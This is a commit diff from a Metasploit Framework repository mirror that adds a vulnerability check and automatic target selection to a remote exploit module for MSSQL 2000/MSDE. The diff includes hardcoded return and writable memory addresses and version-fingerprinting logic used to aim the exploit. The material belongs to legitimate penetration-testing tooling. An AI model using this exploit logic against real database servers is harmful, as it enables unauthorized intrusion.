add check and auto-target selection
git-svn-id: file:///home/svn/framework3/trunk@8048 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
9bf88af0cc
commit
e2a0ff92ce
|
@ -56,7 +56,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# Individual targets
|
||||
#
|
||||
[
|
||||
'MSSQL 2000 / MSDE <= SP2',
|
||||
'MSSQL 2000 / MSDE',
|
||||
{
|
||||
'Writable' => 0x42b6cfe0,
|
||||
'Ret' => 0x42b6be7b
|
||||
|
@ -76,12 +76,43 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
))
|
||||
end
|
||||
|
||||
def check
|
||||
info = mssql_ping
|
||||
if (info and info.has_key?('Version'))
|
||||
|
||||
# TODO: better detection
|
||||
if (info['Version'] =~ /8\.00\.194/)
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
end
|
||||
|
||||
# dump the discovered info and return that we detected MSSQL
|
||||
info.each_pair { |k,v|
|
||||
print_status(" #{k + (" " * (15-k.length))} = #{v}")
|
||||
}
|
||||
return Exploit::CheckCode::Detected
|
||||
end
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
def exploit
|
||||
|
||||
mytarget = nil
|
||||
if target.name =~ /Automatic/
|
||||
# nothing yet...
|
||||
mytarget = targets[1]
|
||||
print_status("Attempting automatic target detection...")
|
||||
info = mssql_ping
|
||||
if (info and info.has_key?('Version'))
|
||||
if (info['Version'] =~ /8\.00\./)
|
||||
mytarget = targets[1]
|
||||
elsif (info['Version'] =~ /9\.00\./)
|
||||
mytarget = targets[2]
|
||||
end
|
||||
end
|
||||
|
||||
if mytarget.nil?
|
||||
raise RuntimeError, "Unable to automatically detect the target"
|
||||
else
|
||||
print_status("Automatically detected target \"#{mytarget.name}\" from version \"#{info['Version']}\"")
|
||||
end
|
||||
else
|
||||
mytarget = target
|
||||
end
|
||||
|
|
Loading…
Reference in New Issue